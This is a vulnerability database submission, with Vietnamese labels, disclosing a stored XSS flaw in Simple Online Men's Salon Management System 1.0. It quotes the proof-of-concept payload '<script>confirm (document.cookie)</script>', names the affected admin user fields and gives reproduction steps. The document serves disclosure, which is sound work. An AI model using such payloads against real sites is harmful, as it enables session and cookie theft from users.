| tiêu đề | Simple Online Men's Salon Management System - Stored XSS |
|---|
| Mô tả | # Exploit Title: Simple Online Men's Salon Management System - Stored XSS
# Exploit Author: Pratik Shetty
# Vendor Name: oretnom23
# Vendor Homepage: https://www.sourcecodester.com/php/15069/simple-online-mens-salon-management-system-php-free-source-code.html
# Software Link: https://www.sourcecodester.com/php/15069/simple-online-mens-salon-management-system-php-free-source-code.html
# Version: v1.0
# Tested on: Windows 10, Apache
`
Description:-
A Stored Cross-Site Scripting (XSS) vulnerability in Simple Online Men's Salon Management System allows to inject Arbitrary JavaScript in Edit in "First Name", " Last Name " and "Username".
`
Payload used:-
<script>confirm (document.cookie)</script>
`
Parameter":-
First Name: <script>confirm (document.cookie)</script>
Last Name: <script>confirm (document.cookie)</script>
Username: <script>confirm (document.cookie)</script>
`
Steps to reproduce:-
1. Login into your admin account
2. Now go to http://localhost/msms/admin/?page=user/list and add an new user
3. In that "First Name", " Last Name " and "Username" parameter put the payload.
<script>confirm (document.cookie)</script>
4. As you can see our payload has been executed. |
|---|
| Nguồn | ⚠️ https://github.com/draco1725/POC/blob/main/Exploit/Simple%20Online%20Men039;s%20Salon%20Management%20System/Stored%20XSS |
|---|
| Người dùng | draco (UID 24011) |
|---|
| Đệ trình | 23/07/2023 22:17 (cách đây 3 những năm) |
|---|
| Kiểm duyệt | 27/07/2023 21:49 (4 days later) |
|---|
| Trạng thái | được chấp nhận |
|---|
| Mục VulDB | 235607 [SourceCodester Simple Online Mens Salon Management System 1.0 /admin/?page=user/list First Name/Last Name/Username Tập lệnh chéo trang] |
|---|
| điểm | 20 |
|---|